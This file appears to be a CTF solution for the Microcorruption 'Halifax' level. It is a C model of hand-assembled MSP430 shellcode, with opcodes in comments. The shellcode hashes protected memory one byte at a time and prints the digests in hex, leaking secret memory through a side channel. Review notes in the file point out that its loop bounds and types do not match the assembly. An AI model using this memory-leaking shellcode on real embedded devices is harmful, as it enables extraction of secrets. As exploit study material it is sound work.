MicroCorruption/25-Halifax/shellcode.c

#include "../common/io.c"
#include "../common/lib.c"
// Short aliases for unsigned 8- and 16-bit integers. u_int8_t / u_int16_t are
// the BSD-style spellings (not the C99 <stdint.h> names); presumably they are
// made visible through the includes above -- verify.
typedef u_int8_t u8;
typedef u_int16_t u16;
/*
print_hash_inline:
; for (i (r11) = 0; i != 0x20; i++)
44aa: 0b43 clr r11
pha_loop:
; byte (r14) = hash[i];
44ac: 0f41 mov sp, r15
44ae: 0f5b add r11, r15
44b0: 6e4f mov.b @r15, r14
; lower_nibble (r15) = byte & 0xf;
44b2: 0f4e mov r14, r15
44b4: 3ff0 0f00 and #0xf, r15
; lower_char (r10) = "0123456789ABCDEF"[lower_nibble];
44b8: 5a4f 1047 mov.b 0x4710(r15), r10
; upper_nibble (r14) = (byte >> 0x4) & 0xf;
44bc: 12c3 clrc
44be: 4e10 rrc.b r14
44c0: 12c3 clrc
44c2: 4e10 rrc.b r14
44c4: 12c3 clrc
44c6: 4e10 rrc.b r14
44c8: 12c3 clrc
44ca: 4e10 rrc.b r14
44cc: 3ef0 0f00 and #0xf, r14
; putchar("0123456789ABCDEF"[upper_nibble]);
44d0: 5f4e 1047 mov.b 0x4710(r14), r15
44d4: b012 7845 call #0x4578 <putchar>
; putchar(lower_char)
44d8: 4f4a mov.b r10, r15
44da: b012 7845 call #0x4578 <putchar>
; ... i != 0x20; i++)
44de: 1b53 inc r11
44e0: 3b90 2000 cmp #0x20, r11
44e4: e323 jne #0x44ac <pha_loop>
; puts (""); // prints newline
44e6: 3f40 2147 mov #0x4721, r15
44ea: b012 8645 call #0x4586 <puts>
*/
// Hex digit table indexed by a 4-bit nibble in main's print loop. It mirrors
// the "0123456789ABCDEF" string that the annotated disassembly above reads
// at 0x4710.
const char *HEX_LUT = "0123456789ABCDEF";
/*
 * C model of the shellcode. Each C statement sits next to an "asm" comment
 * holding the hand-assembled MSP430 it corresponds to.
 *
 * Stages, as written below:
 *   1. get_sram_hashes: for every addr in [0, 0x40) call
 *      sha256_internal(addr, 1, out), moving out forward 3 bytes per address.
 *   2. print_hex: print the first 0x40 * 3 = 0xC0 bytes at shabuffer as
 *      upper-case hex, high nibble first.
 *   3. Read up to 0x40 bytes with getsn() into mem_get(0x9000), then call
 *      sha256_internal(0, 0x40, 0x9000).
 *
 * NOTE(review): mem_get, sha256_internal and getsn are not defined in this
 * file (presumably ../common); their exact contracts are not visible here.
 */
void main () {
    // consts don't need registers
    const u16 start = 0;
    const u16 length = 0x40;
    // Bytes printed by print_hex: 3 per address, 0xC0 in total. This is the
    // bound the asm print loop compares r11 against.
    const int printed = length * 3;
    // The buffer base never changes either, but the asm keeps the running
    // output pointer in a register (r13), so it is modelled as a variable.
    u8 *shabuffer = mem_get(0x8000);
    u8 *out = shabuffer;

    // assemble the shabuffer
    /*asm
    clr r11 // loop variable in r11
    mov #1, r14
    mov shabuffer [0x8000], r13
    */
get_sram_hashes:
    // NOTE(review): the asm below loops until r11 reaches 0x1000, while this
    // C model stops at length (0x40) -- confirm which bound is intended.
    for (u16 addr = start; addr < length; addr++, out += 3) {
        // we require at least 5 nibbles to determine the value
        // The 3-byte stride keeps 6 nibbles per address. Presumably each call
        // writes a full 0x20-byte digest (the disassembly in the file header
        // prints 0x20 bytes), so every call overwrites the tail of the
        // previous one and the last one runs past the printed 0xC0 bytes
        // -- TODO confirm against sha256_internal.
        /*asm
        loop:
        0f4b mov r11, r15; mov addr r15
        b012 b645 call #0x45b6 <sha256_internal>
        3d50 0300 add #3, r13
        1b53 add 0(r3), r11; inc r11
        3b90 0010 cmp #0x1000, r11
        jnc loop
        */
        sha256_internal (addr, 1, out);
    }

print_hex:
    // print the buffer
    /*asm
    0b43 clr r11;
    */
    for (int pos = 0; pos < printed; pos++) {
        /*asm
        1e4b 0080 mov 0x8000(r11), r14
        */
        const u8 byte = shabuffer[pos];
        // rra.b is an arithmetic shift; the `and #0xf` that follows discards
        // whatever the shifts left in the upper bits, matching the mask here.
        /*asm
        5e4b 0080 mov.b 0x8000(r11), r14
        4f4e mov.b r14, r15
        0f11 rra.b r15
        0f11 rra.b r15
        0f11 rra.b r15
        0f11 rra.b r15
        3ef0 0f00 and #0xf, r14
        3ff0 0f00 and #0xf, r15
        12c3 clrc
        */
        const u8 upper_nibble = (byte >> 4) & 0xf;
        const u8 lower_nibble = byte & 0xf;
        // High nibble goes out first.
        /*asm
        5f4f 1047 mov.b 0x4710(r15), r15
        b012 7845 call #0x4578; <putchar>
        */
        putchar(HEX_LUT[upper_nibble]);
        /*asm
        5f4e 1047 mov.b 0x4710(r14), r15
        b012 7845 call #0x4578; <putchar>
        */
        putchar(HEX_LUT[lower_nibble]);
        /*asm
        1b53 add 0(r3), r11
        3b90 c000 cmp #0xC0, r11
        e82b jnc $-0x28
        */
    }

    // NOTE(review): getsn() receives mem_get(0x9000), but sha256_internal()
    // receives the bare integer 0x9000, whereas the call in the first loop
    // passes a u8 * derived from mem_get(). Confirm the third parameter's
    // type and whether mem_get(0x9000) was intended here.
    getsn(mem_get(0x9000), 0x40);
    sha256_internal(0, 0x40, 0x9000);
    /*asm
    3041 ret;
    */
    return;
}